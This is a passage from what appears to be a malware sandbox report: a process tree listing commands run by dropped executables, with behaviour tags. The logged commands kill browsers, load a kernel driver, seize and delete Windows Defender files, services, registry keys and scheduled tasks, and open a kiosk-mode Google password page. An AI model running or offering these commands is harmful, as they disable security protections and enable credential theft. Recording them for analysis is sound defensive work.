                                                                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                          5⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:12112
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM msedge.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:11748
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM chrome.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:4684
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM msedge.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:7616
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM brave.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:5512
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM opera.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8008
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM vivaldi.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8136
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM firefox.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:3324
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM dragon.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:6628
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM maxthon.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:4592
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM uc_browser.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8648
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM slimjet.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8376
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM cent_browser.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8444
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM epic.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8768
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM torch.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8820
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM whale.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8860
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM 360browser.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8920
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM qqbrowser.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:8992
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM browser.exe
                                                                          5⤵
                                                                            PID:9064
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM chrome.exe
                                                                            5⤵
                                                                            • Kills process with taskkill
                                                                            PID:9188
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM msedge.exe
                                                                            5⤵
                                                                              PID:9272
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM brave.exe
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:9408
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM opera.exe
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:9508
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM vivaldi.exe
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:9736
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM firefox.exe
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:9684
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM dragon.exe
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:10048
                                                                          • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3312
                                                                            • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                              5⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1228
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\27A7.tmp\27A8.tmp\27A9.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                6⤵
                                                                                  PID:3324
                                                                                  • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                    7⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3788
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\28C1.tmp\28C2.tmp\28C3.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                      8⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:1344
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1512
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc start ddrver
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5096
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        9⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:920
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop ddrver
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:6012
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc start ddrver
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:336
                                                                                      • C:\Windows\system32\takeown.exe
                                                                                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                        9⤵
                                                                                        • Possible privilege escalation attempt
                                                                                        • Modifies file permissions
                                                                                        PID:224
                                                                                      • C:\Windows\system32\icacls.exe
                                                                                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                        9⤵
                                                                                        • Possible privilege escalation attempt
                                                                                        • Modifies file permissions
                                                                                        PID:3596
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop "WinDefend"
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5700
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc delete "WinDefend"
                                                                                        9⤵
                                                                                        • Launches sc.exe
                                                                                        PID:4816
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                        9⤵
                                                                                          PID:184
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop "MDCoreSvc"
                                                                                          9⤵
                                                                                          • Launches sc.exe
                                                                                          PID:1056
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc delete "MDCoreSvc"
                                                                                          9⤵
                                                                                          • Launches sc.exe
                                                                                          PID:5832
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                          9⤵
                                                                                            PID:3332
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc stop "WdNisSvc"
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:5452
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc delete "WdNisSvc"
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3620
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                            9⤵
                                                                                              PID:2256
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc stop "Sense"
                                                                                              9⤵
                                                                                              • Launches sc.exe
                                                                                              PID:5100
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc delete "Sense"
                                                                                              9⤵
                                                                                              • Launches sc.exe
                                                                                              PID:5680
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                              9⤵
                                                                                                PID:1196
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop "wscsvc"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2616
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc delete "wscsvc"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:1688
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                9⤵
                                                                                                • Modifies security service
                                                                                                PID:2380
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop "SgrmBroker"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2400
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc delete "SgrmBroker"
                                                                                                9⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2264
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                9⤵
                                                                                                  PID:1060
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc stop "SecurityHealthService"
                                                                                                  9⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:5600
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc delete "SecurityHealthService"
                                                                                                  9⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:912
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                  9⤵
                                                                                                    PID:2520
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop "webthreatdefsvc"
                                                                                                    9⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2368
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc delete "webthreatdefsvc"
                                                                                                    9⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:5720
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                    9⤵
                                                                                                      PID:4952
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      sc stop "webthreatdefusersvc"
                                                                                                      9⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:748
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      sc delete "webthreatdefusersvc"
                                                                                                      9⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:116
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                      9⤵
                                                                                                        PID:2812
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc stop "WdNisDrv"
                                                                                                        9⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:5496
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc delete "WdNisDrv"
                                                                                                        9⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:3736
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                        9⤵
                                                                                                          PID:3368
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc stop "WdBoot"
                                                                                                          9⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1788
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc delete "WdBoot"
                                                                                                          9⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:2636
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                          9⤵
                                                                                                            PID:3700
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop "WdFilter"
                                                                                                            9⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2388
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc delete "WdFilter"
                                                                                                            9⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:3324
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                            9⤵
                                                                                                              PID:2540
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc stop "SgrmAgent"
                                                                                                              9⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:4012
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc delete "SgrmAgent"
                                                                                                              9⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:1468
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                              9⤵
                                                                                                                PID:5624
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "MsSecWfp"
                                                                                                                9⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1792
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc delete "MsSecWfp"
                                                                                                                9⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:3644
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                9⤵
                                                                                                                  PID:3520
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc stop "MsSecFlt"
                                                                                                                  9⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:4132
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc delete "MsSecFlt"
                                                                                                                  9⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1692
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                  9⤵
                                                                                                                    PID:2040
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "MsSecCore"
                                                                                                                    9⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1004
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "MsSecCore"
                                                                                                                    9⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:5004
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                    9⤵
                                                                                                                      PID:1460
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                      9⤵
                                                                                                                        PID:4088
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                        9⤵
                                                                                                                          PID:4520
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                          9⤵
                                                                                                                            PID:4516
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                            9⤵
                                                                                                                              PID:5080
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop ddrver
                                                                                                                              9⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:5956
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc delete ddrver
                                                                                                                              9⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:4688
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413810101\9dd9486eaa.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413810101\9dd9486eaa.exe"
                                                                                                                    4⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:3616
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413810101\9dd9486eaa.exe"
                                                                                                                      5⤵
                                                                                                                      • Downloads MZ/PE file
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4512
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413820101\75de17feb5.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413820101\75de17feb5.exe"
                                                                                                                    4⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4060
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413820101\75de17feb5.exe"
                                                                                                                      5⤵
                                                                                                                      • Downloads MZ/PE file
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:440
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413830101\f546943e6b.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413830101\f546943e6b.exe"
                                                                                                                    4⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2216
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413840101\9abdceef4f.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413840101\9abdceef4f.exe"
                                                                                                                    4⤵
                                                                                                                    • Downloads MZ/PE file
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks processor information in registry
                                                                                                                    PID:2860
                                                                                                                    • C:\Users\Admin\AppData\Local\vPNCkR23SqVw.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\vPNCkR23SqVw.exe"
                                                                                                                      5⤵
                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Identifies Wine through registry keys
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:3144
                                                                                                                    • C:\Users\Admin\AppData\Local\tfVGZEtwjsyK.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\tfVGZEtwjsyK.exe"
                                                                                                                      5⤵
                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Identifies Wine through registry keys
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5784
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413850101\f459e28627.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413850101\f459e28627.exe"
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:3324
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM firefox.exe /T
                                                                                                                      5⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5948
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM chrome.exe /T
                                                                                                                      5⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5800
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM msedge.exe /T
                                                                                                                      5⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4888
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM opera.exe /T
                                                                                                                      5⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5552
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM brave.exe /T
                                                                                                                      5⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4688
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                      5⤵
                                                                                                                        PID:2156
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                          6⤵
                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:5264
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2072 -initialChannelId {9b4f5693-036c-44a1-bb9e-e71aa72ef0d4} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                            7⤵
                                                                                                                              PID:4148
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2468 -prefsLen 27135 -prefMapHandle 2472 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {fd3a517d-04b2-4a6c-bf9e-002971f5ea7b} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                              7⤵
                                                                                                                                PID:4896
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3796 -prefsLen 25164 -prefMapHandle 3800 -prefMapSize 270279 -jsInitHandle 3804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3812 -initialChannelId {509b67a7-c37f-4c97-af69-bd4d843eb1fc} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                7⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                PID:1764
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3960 -prefsLen 27276 -prefMapHandle 3964 -prefMapSize 270279 -ipcHandle 4044 -initialChannelId {38bfff84-c5b4-47f0-95b7-652cdae2a858} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                7⤵
                                                                                                                                  PID:2820
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3088 -prefsLen 34775 -prefMapHandle 1616 -prefMapSize 270279 -jsInitHandle 3228 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4608 -initialChannelId {14a9d4cd-c6e2-48e1-bcf2-eacb49efda57} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                  7⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:1196
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5180 -prefsLen 35012 -prefMapHandle 5184 -prefMapSize 270279 -ipcHandle 5192 -initialChannelId {cfbfa528-31ab-48e1-aa7e-7ed7fc86ffff} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                  7⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:7020
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5676 -prefsLen 32952 -prefMapHandle 5680 -prefMapSize 270279 -jsInitHandle 5684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5640 -initialChannelId {181adea7-2fc4-4ff9-bc05-b3a818e92e68} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                  7⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:6188
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5760 -prefsLen 32952 -prefMapHandle 5764 -prefMapSize 270279 -jsInitHandle 5768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5776 -initialChannelId {c02da2b6-af52-4376-90ce-459b91ee8021} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                  7⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:6200
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5948 -prefsLen 32952 -prefMapHandle 5952 -prefMapSize 270279 -jsInitHandle 5956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5964 -initialChannelId {d6a1346f-fbe1-44ce-b4f2-b8239bd17d2d} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                  7⤵
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:6216
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2072 -prefsLen 35081 -prefMapHandle 5108 -prefMapSize 270279 -ipcHandle 5112 -initialChannelId {f35cd536-b75a-4d99-a984-75463dad33fb} -parentPid 5264 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5264" -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 gpu
                                                                                                                                  7⤵
                                                                                                                                    PID:11728
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413860101\4c97d23fc0.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413860101\4c97d23fc0.exe"
                                                                                                                              4⤵
                                                                                                                              • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                              • Modifies Windows Defender TamperProtection settings
                                                                                                                              • Modifies Windows Defender notification settings
                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Identifies Wine through registry keys
                                                                                                                              • Windows security modification
